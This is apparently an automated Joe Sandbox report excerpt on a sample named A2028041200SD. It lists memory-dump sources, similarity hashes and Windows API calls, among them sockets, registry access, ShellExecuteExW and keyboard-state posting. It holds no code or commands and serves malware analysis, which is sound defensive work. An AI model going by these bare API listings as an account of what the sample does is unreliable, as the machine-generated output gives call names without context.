                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafeVartype
                                                                        • String ID:
                                                                        • API String ID: 1725837607-0
                                                                        • Opcode ID: b35179455ca4bfc64272badb98f6f078e687a21a95fbf94be4d8a9bc6c24860b
                                                                        • Instruction ID: dd2b93b46b0b4d3e2595f29900ef0bbe1948b6a2b39bbe4fa99479f8f3a712c6
                                                                        • Opcode Fuzzy Hash: b35179455ca4bfc64272badb98f6f078e687a21a95fbf94be4d8a9bc6c24860b
                                                                        • Instruction Fuzzy Hash: E8C1B076A0421ADFDB10CF98C485BAEB7F5FF08311F204469E686E7291D735AA41CF91
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00936B63
                                                                        • LoadStringW.USER32(00000000), ref: 00936B6A
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00936B80
                                                                        • LoadStringW.USER32(00000000), ref: 00936B87
                                                                        • _wprintf.LIBCMT ref: 00936BAD
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00936BCB
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00936BA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: 15d23022dbf2f103c776b3d048bbff258f6c33caba0cd93d3659e50ff6358a5d
                                                                        • Instruction ID: 40debb35467b1037ac8ad0c782c7e2a2ea7e9eaaf72e3c97121115a4eb9ef97b
                                                                        • Opcode Fuzzy Hash: 15d23022dbf2f103c776b3d048bbff258f6c33caba0cd93d3659e50ff6358a5d
                                                                        • Instruction Fuzzy Hash: 7B0112F75042087FEB11AB949D89EE6777CDB04704F4044A1B749E6141EA749EC49F70
                                                                        APIs
                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00952BF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 2595220575-0
                                                                        • Opcode ID: 37bade645dee2301731f8a850c2786050e367b2c1651c85b75d2e56976cf5414
                                                                        • Instruction ID: 1c57f32f4582cf049f8157f6ac2aa4af9d0661e36b015a7d075df0641ece7774
                                                                        • Opcode Fuzzy Hash: 37bade645dee2301731f8a850c2786050e367b2c1651c85b75d2e56976cf5414
                                                                        • Instruction Fuzzy Hash: F9916B752042059FCB00EF29C895B6EB7F5FF89311F04885DF9969B2A1DB34E949CB42
                                                                        APIs
                                                                        • select.WSOCK32 ref: 00949691
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0094969E
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009496C8
                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009496E9
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009496F8
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 009497AA
                                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0098DC00), ref: 00949765
                                                                          • Part of subcall function 0092D2FF: _strlen.LIBCMT ref: 0092D309
                                                                        • _strlen.LIBCMT ref: 00949800
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                        • String ID:
                                                                        • API String ID: 3480843537-0
                                                                        • Opcode ID: 2e4747f11d773d19684f35323f9957afee55b9ade5820a7bd6be05e2999ab6fa
                                                                        • Instruction ID: 6f465fd684f77919916732017d22934c8612558780480dc0557debaae6219cc8
                                                                        • Opcode Fuzzy Hash: 2e4747f11d773d19684f35323f9957afee55b9ade5820a7bd6be05e2999ab6fa
                                                                        • Instruction Fuzzy Hash: 02817B72504204AFC714EF68CC86F6BB7A9FFC5714F104A19F6559B2A1EB30E905CB92
                                                                        APIs
                                                                        • __mtinitlocknum.LIBCMT ref: 0091A991
                                                                          • Part of subcall function 00917D7C: __FF_MSGBANNER.LIBCMT ref: 00917D91
                                                                          • Part of subcall function 00917D7C: __NMSG_WRITE.LIBCMT ref: 00917D98
                                                                          • Part of subcall function 00917D7C: __malloc_crt.LIBCMT ref: 00917DB8
                                                                        • __lock.LIBCMT ref: 0091A9A4
                                                                        • __lock.LIBCMT ref: 0091A9F0
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,009A6DE0,00000018,00925E7B,?,00000000,00000109), ref: 0091AA0C
                                                                        • EnterCriticalSection.KERNEL32(8000000C,009A6DE0,00000018,00925E7B,?,00000000,00000109), ref: 0091AA29
                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 0091AA39
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1422805418-0
                                                                        • Opcode ID: eca1b74b3db2ef2d89ee9c6c2e7294771231be9357aa9448fb2fe9a68af023b5
                                                                        • Instruction ID: af3ab2aae6085c93c2b0351036593b2d26cc71ed715b588dfd92ae76c227cf74
                                                                        • Opcode Fuzzy Hash: eca1b74b3db2ef2d89ee9c6c2e7294771231be9357aa9448fb2fe9a68af023b5
                                                                        • Instruction Fuzzy Hash: D1412771B0620A9BEB209F68DA447DDB7B5AF41335F148318E569AB2D1D7749CC0CB82
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 00958EE4
                                                                        • GetDC.USER32(00000000), ref: 00958EEC
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00958EF7
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00958F03
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00958F3F
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00958F50
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0095BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00958F8A
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00958FAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: b3377925385b83cdb496746ca465938b3c6b8434c6a8ad0038bde7e87cf65974
                                                                        • Instruction ID: cf025f0521e8dfba1609aaa8f1d6382ca77b116a77a8a84f59858cd43f175a18
                                                                        • Opcode Fuzzy Hash: b3377925385b83cdb496746ca465938b3c6b8434c6a8ad0038bde7e87cf65974
                                                                        • Instruction Fuzzy Hash: 49317F72215214BFEB109F51CC4AFEB3BADEF49716F044065FE08AA191C6759841DBB0
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                        • _wcstok.LIBCMT ref: 0094184E
                                                                        • _wcscpy.LIBCMT ref: 009418DD
                                                                        • _memset.LIBCMT ref: 00941910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 774024439-3081909835
                                                                        • Opcode ID: aa14848bf788f39d3b302d61e52209dd08b45a337e2dbfb5fc07c5f3757d89d3
                                                                        • Instruction ID: 02977b4f5ec8b5c307c543f233374e3c1edd63b6b3a11907bd21c6d4b9ee06b5
                                                                        • Opcode Fuzzy Hash: aa14848bf788f39d3b302d61e52209dd08b45a337e2dbfb5fc07c5f3757d89d3
                                                                        • Instruction Fuzzy Hash: B6C15C356043449FC724EF28C991E6AB7E4FF85354F10492DFA99972A2DB30ED85CB82
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0096016D
                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0096038D
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009603AB
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009603D6
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009603FF
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00960421
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00960440
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                        • String ID:
                                                                        • API String ID: 3356174886-0
                                                                        • Opcode ID: 7adce413f8935e2ec2d07316f405c5a7ac2b20fbec9e4f81f2e3b46f2f52d166
                                                                        • Instruction ID: 7488ddae700e9784f2b03ef248f31df3ca22ac075d542d51bab9db201149ac18
                                                                        • Opcode Fuzzy Hash: 7adce413f8935e2ec2d07316f405c5a7ac2b20fbec9e4f81f2e3b46f2f52d166
                                                                        • Instruction Fuzzy Hash: 22A1BD35600616EFDB18CF68C9D9BBEBBB5FF88701F148115E858A7290E734AD50DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 680fc94101fac870d54a0215e5422cd724deba27067adadb1f58fefcd9075061
                                                                        • Instruction ID: c1d1f8b16adbba7e29175097dac8274cafadefd78c03d37767f0812ea4608b67
                                                                        • Opcode Fuzzy Hash: 680fc94101fac870d54a0215e5422cd724deba27067adadb1f58fefcd9075061
                                                                        • Instruction Fuzzy Hash: DC716F7190420AEFCB14CF98CC49EAEBB79FF85314F148549FA15AB291C734AA41CFA5
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0095225A
                                                                        • _memset.LIBCMT ref: 00952323
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00952368
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0095242F
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0095243E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                        • String ID: @
                                                                        • API String ID: 4082843840-2766056989
                                                                        • Opcode ID: 915ee0554bf5b735bbc6c9fc3835a13617f0c8c5eceb5fe79b2cf194967829a2
                                                                        • Instruction ID: 6b21b2896e4875088698331cacd6daf4743bd8c32cbfb7764a6f6e6eb824f128
                                                                        • Opcode Fuzzy Hash: 915ee0554bf5b735bbc6c9fc3835a13617f0c8c5eceb5fe79b2cf194967829a2
                                                                        • Instruction Fuzzy Hash: 03718E75A006199FCF04EFA9C881AAEB7F5FF49310F108459E859AB391DB34AE44CB91
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 00933DE7
                                                                        • GetKeyboardState.USER32(?), ref: 00933DFC
                                                                        • SetKeyboardState.USER32(?), ref: 00933E5D
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00933E8B
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00933EAA
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00933EF0
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00933F13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: db42659f98bec252a5ca5fe918e496388c33d0f68f77a2dc82b08995150d619a
                                                                        • Instruction ID: a84916ffc4d6911f84e4bf270c8920be346e73567246ddd348b795d5b1069868
                                                                        • Opcode Fuzzy Hash: db42659f98bec252a5ca5fe918e496388c33d0f68f77a2dc82b08995150d619a
                                                                        • Instruction Fuzzy Hash: 9C51C3A0A987D53EFB3643648C46BB67EA95F06304F08C589F0D9468C2D398EEC4DB60
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 00933C02
                                                                        • GetKeyboardState.USER32(?), ref: 00933C17
                                                                        • SetKeyboardState.USER32(?), ref: 00933C78
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00933CA4
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00933CC1
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00933D05
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00933D26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: de8a0c79d7cf5e9109064aadbe4e908a15f528fc8ae591e12d7750c8e6e9b229
                                                                        • Instruction ID: 8eed85fedfb81babcbaed555f828cad005501a1784b2cf0ad37504b5c34ce3bc
                                                                        • Opcode Fuzzy Hash: de8a0c79d7cf5e9109064aadbe4e908a15f528fc8ae591e12d7750c8e6e9b229
                                                                        • Instruction Fuzzy Hash: A451F6A15887D53DFB3287748C46B76BFADAF06300F08C488E4D55A8C2D694EEC4EB60
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        • API String ID: 2945705084-0
                                                                        • Opcode ID: 4f14b181a9e24ca5051911dcfa30735b1d494a3b2ce10fa991581bb69ae2130b
                                                                        • Instruction ID: ef10111d879594d8016a77683528b0243bcc374e3eb161e338765dd32ac0d322
                                                                        • Opcode Fuzzy Hash: 4f14b181a9e24ca5051911dcfa30735b1d494a3b2ce10fa991581bb69ae2130b
                                                                        • Instruction Fuzzy Hash: 19419466E10218B6CB20EBF4CC46ACFB3ACAF84710F508966E518F3121F675D691CBE5
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00959FA3
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0095A04A
                                                                        • IsMenu.USER32(?), ref: 0095A062
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0095A0AA
                                                                        • DrawMenuBar.USER32 ref: 0095A0C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                        • String ID: 0
                                                                        • API String ID: 3866635326-4108050209
                                                                        • Opcode ID: 5cbb9ea10b9c8cce1d6d82793acfb2737f4001c6d2c559d876087f56cdc679db
                                                                        • Instruction ID: e9368ba20a142b51535564cec83dfc6f58eae3bc58b86380b5491fc1a7c5cd0b
                                                                        • Opcode Fuzzy Hash: 5cbb9ea10b9c8cce1d6d82793acfb2737f4001c6d2c559d876087f56cdc679db
                                                                        • Instruction Fuzzy Hash: E4417975A10208EFDB10CF61D894EAABBB8FF09325F048619FD1597290D335AD58DF61
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00953DA1
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00953DCB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00953E80
                                                                          • Part of subcall function 00953D72: RegCloseKey.ADVAPI32(?), ref: 00953DE8
                                                                          • Part of subcall function 00953D72: FreeLibrary.KERNEL32(?), ref: 00953E3A
                                                                          • Part of subcall function 00953D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00953E5D
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00953E25
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: 38608913f7489aedff141b1845becee785de4589372cf6e22cdf1c589b10c564
                                                                        • Instruction ID: 1cd3560adc4b2c63e6bf7de9a928c2b3c8f76b792217bf8131409a5cd08bdc30
                                                                        • Opcode Fuzzy Hash: 38608913f7489aedff141b1845becee785de4589372cf6e22cdf1c589b10c564
                                                                        • Instruction Fuzzy Hash: 133129B2915109BFDB15DB91DC8AAFFB7BCEF09341F00416AE912E2150D6749F8C9BA0
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00935FA6,?), ref: 00936EF1
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00935FC9
                                                                        • _wcscmp.LIBCMT ref: 00935FE7
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00936000
                                                                          • Part of subcall function 00936318: GetFileAttributesW.KERNEL32(?,?,?,?,009360C3), ref: 00936369
                                                                          • Part of subcall function 00936318: GetLastError.KERNEL32(?,?,?,009360C3), ref: 00936374
                                                                          • Part of subcall function 00936318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009360C3), ref: 00936388
                                                                        • _wcscat.LIBCMT ref: 00936042
                                                                        • SHFileOperationW.SHELL32 ref: 009360AA
                                                                        Strings
